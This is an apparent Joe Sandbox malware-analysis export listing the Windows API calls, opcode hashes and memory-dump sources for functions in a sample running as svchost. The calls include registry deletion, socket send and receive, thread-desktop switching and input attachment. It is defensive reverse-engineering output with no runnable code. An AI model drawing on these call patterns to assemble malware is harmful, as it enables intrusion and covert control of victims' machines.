                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2033102291-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CA42A9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA42DC
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA4308
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA432F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02CA43AD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C913DE
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9141A
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C91446
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9146D
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C91498
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,02CA369B,00000000,00010108,?,00000000), ref: 02CB522F
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02CB5264
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CB528E
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(00000104,02CA369B), ref: 02CB52A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CB52B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              • Opcode ID: 73dfcad78fcbebec94101eaaf9a070d624a0624dbfbd6c0aeadef1331d669cba
                                                                                                                                                                                                              • Instruction ID: 2b1f8d446daa69d77749dec07dd4f9bb632a6be9ecb0e01ee53ea1837bfcd1df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dfcad78fcbebec94101eaaf9a070d624a0624dbfbd6c0aeadef1331d669cba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7921C876E41218ABDB21DA98DC44FEAB7BCEF84790F448655FD40EB240D6B0AE048BD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2377537114-0
                                                                                                                                                                                                              • Opcode ID: 4fe419e364e84257ffc5ccffc7c456a1daf0fdc55bec08362426594151285da6
                                                                                                                                                                                                              • Instruction ID: e9d76a9ae90bb9ee59f4fad2a2d638d637dce771694edb89b6f06d8fb2943707
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fe419e364e84257ffc5ccffc7c456a1daf0fdc55bec08362426594151285da6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B2181B0A0020A9FDB14CF59D485B6ABBE5FF89344F14892DE94EC3300D7B1A660CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C95962
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02C95995
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02C959C1
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02C959E8
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C95A04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 1f1f297d344222bd51b00c4435a6ff1eabadb2159585e0c57a3a4e019c095061
                                                                                                                                                                                                              • Instruction ID: 79ed7b0be58802a683a2848ddc8a57ef27ad5e366bd51c3b9b38d5bf1b1cacd2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f1f297d344222bd51b00c4435a6ff1eabadb2159585e0c57a3a4e019c095061
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73319BB5D4120DEFDB40CFA8D985AEEBBF5FB48340F50456AE914E7240E7749A148F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,02CA0AA8,000000FF,00000000,00000000,00000000,00000000,74DEF380,?,?,02CA0AA8,?), ref: 02CAAA37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,00000000,?,02CA0AA8,?), ref: 02CAAA54
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02CA0AA8,?), ref: 02CAAA5B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAAA6B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,02CA0AA8,000000FF,00000000,00000000,00000000,00000000,?,02CA0AA8,?), ref: 02CAAA88
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 913929354-0
                                                                                                                                                                                                              • Opcode ID: 32804ff80fd7af7ff300106bd32264dd879c46c27453051e1a6e84c8513a8252
                                                                                                                                                                                                              • Instruction ID: 90ecf2092f4ec860dd267ca643b6292d9e69f0ba3217fa3b020bd24663dc14ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32804ff80fd7af7ff300106bd32264dd879c46c27453051e1a6e84c8513a8252
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2601A2726823227BE63149A99C48FA73BACDF86BF5F540310BA15EA1C4DB60DD01C6F4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C96C5C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3057210225-0
                                                                                                                                                                                                              • Opcode ID: e7536d9ebcc44799b19b968b2fd24680c4ffc87095cb935fe53e2f6ea8bcf299
                                                                                                                                                                                                              • Instruction ID: 6a372a6093db421148ab250cc2c9a77f1ee3d933eb63705379e45f205096d730
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7536d9ebcc44799b19b968b2fd24680c4ffc87095cb935fe53e2f6ea8bcf299
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33112B71E462585BEB2A97349D4DBDD376CEB08704F500AA8FB45D21C0D7B0CA94C6D1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,74D723A0,?,?), ref: 02CA998D
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA9994
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02CA99AF
                                                                                                                                                                                                              • send.WS2_32(?,?,00000000,00000000), ref: 02CA99C0
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02CA99D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heaprecv$FreeProcesssend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2415998009-0
                                                                                                                                                                                                              • Opcode ID: 5e0c6abdd64a67bf2969c7fef64fbd7fc165ad319e8dc2265eb6ce06d1179850
                                                                                                                                                                                                              • Instruction ID: afdb49f29d08c023fca486a91a69b9d64f2112dda762d10238f50e298185434c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0c6abdd64a67bf2969c7fef64fbd7fc165ad319e8dc2265eb6ce06d1179850
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A701D4B26412147BE7209B788C46FAB7B6CAF89744F444195FB08EB181D674EA41CBF4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000), ref: 02C9D242
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C9D259
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C9D26F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9D280
                                                                                                                                                                                                              • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C9D297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1270303404-0
                                                                                                                                                                                                              • Opcode ID: 488eff9aa5b2e23d929fe9a649a327b383cccfa459993694c2a0c91992dfefa1
                                                                                                                                                                                                              • Instruction ID: d85eb9e84a7b63442c1c5a68c909b28c088db9d930c4376ba40fc5c373669810
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 488eff9aa5b2e23d929fe9a649a327b383cccfa459993694c2a0c91992dfefa1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24013175982218BBEB20EB90DC09FEE7B6CAB05785F400694FA05E61C0D7F05A948BE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,?,00000000,74DF3080,?,02C9922C,?,00000006,00000000), ref: 02C9E38C
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C9E3A3
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C9E3A6
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000006,?,02C9922C), ref: 02C9E3BD
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 02C9E3C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3855296974-0
                                                                                                                                                                                                              • Opcode ID: c8441a4a65862bfcb31927286ad4c06c649dfca26657ba61eea7025e4adb783f
                                                                                                                                                                                                              • Instruction ID: cae630f546d8276005ef16ee9140f2ea8547c82d09d527e51ffd81bba51e08ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8441a4a65862bfcb31927286ad4c06c649dfca26657ba61eea7025e4adb783f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BF0F476A82218BBD721AA69DC44F6B779CEBD8760F014615FE04D7340D6B0ED118AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9D2BC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9D2C4
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C9D2D0
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000000D,?,?), ref: 02C9D2E1
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C9D2ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643679612-0
                                                                                                                                                                                                              • Opcode ID: a1d5814312d5bf0d2107617e7f4eeda9981708d22716dab1a6dd7c552223ac32
                                                                                                                                                                                                              • Instruction ID: 8d0556d58059b95399dfa88562065a153604afccd44a2e01288184d8c4c3a993
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1d5814312d5bf0d2107617e7f4eeda9981708d22716dab1a6dd7c552223ac32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF06C766823047FD3105BA5EC8DFABBF6CEB497A2F504916FA05D7241C670A810C771
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9E34A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9E352
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C99F24,?,?,?,?,02C99400,?,?), ref: 02C9E364
                                                                                                                                                                                                              • GetFocus.USER32 ref: 02C9E366
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C99F24,?,?,?,?,02C99400,?,?), ref: 02C9E373
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 968181190-0
                                                                                                                                                                                                              • Opcode ID: 4ac1595110900ff5de39dfae908fe42dd5109de640a72c154354137270dc3bb9
                                                                                                                                                                                                              • Instruction ID: 645a22b75e1c94e4a40fcf57964a95ccb5ae43231c47ebdc610255e11aa3a0f2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ac1595110900ff5de39dfae908fe42dd5109de640a72c154354137270dc3bb9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7E09271E82304BBD61057A6AC4DFABBBACEB857A2F900555FA08D3240D671AC1086B5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,02CA8E9D,?,?,?,?,?,?), ref: 02C97987
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C97992
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C9799A
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C979A5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C979AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1233776721-0
                                                                                                                                                                                                              • Opcode ID: 0d77d5873bab947444c3cebf400ccf6bf11687dc4ed5f399024abce5ade86066
                                                                                                                                                                                                              • Instruction ID: 64453ecf587efee738c11ba119a29022a0a41b944dec38a45c201b517bdcf4a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d77d5873bab947444c3cebf400ccf6bf11687dc4ed5f399024abce5ade86066
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05D05E71EA31109FDB122B32EC0C73E7668FF8AB96B890A19FC02E1140DF34C216C665
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC41EB
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC41FD
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC420F
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC4221
                                                                                                                                                                                                              • free.MSVCRT(?,75977310,00000000,02CBA320), ref: 02CC422B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: e90e20c4f6abc591697983756e2129cb84ee51be565600c671708d78d50513bc
                                                                                                                                                                                                              • Instruction ID: a8f07ac914eba6ed0216352ebef1e9c58283f22da985b5bc10957aa0be1ea716
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e90e20c4f6abc591697983756e2129cb84ee51be565600c671708d78d50513bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B90152F2A417815BD734DFA998E281BB6E56D84108369C83ED1DFC7A08D331FA489711
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CC13F9
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02CC1405
                                                                                                                                                                                                              • malloc.MSVCRT ref: 02CC14AC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02CC14B8
                                                                                                                                                                                                                • Part of subcall function 02CC0EA0: __WSAFDIsSet.WS2_32(?,?), ref: 02CC0F50
                                                                                                                                                                                                                • Part of subcall function 02CC0EA0: closesocket.WS2_32(?), ref: 02CC0F6D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 403730927-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 948496778-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fwrite$fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3883414211-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA2392
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 02CA239E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000104), ref: 02CA23B5
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02CA23D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
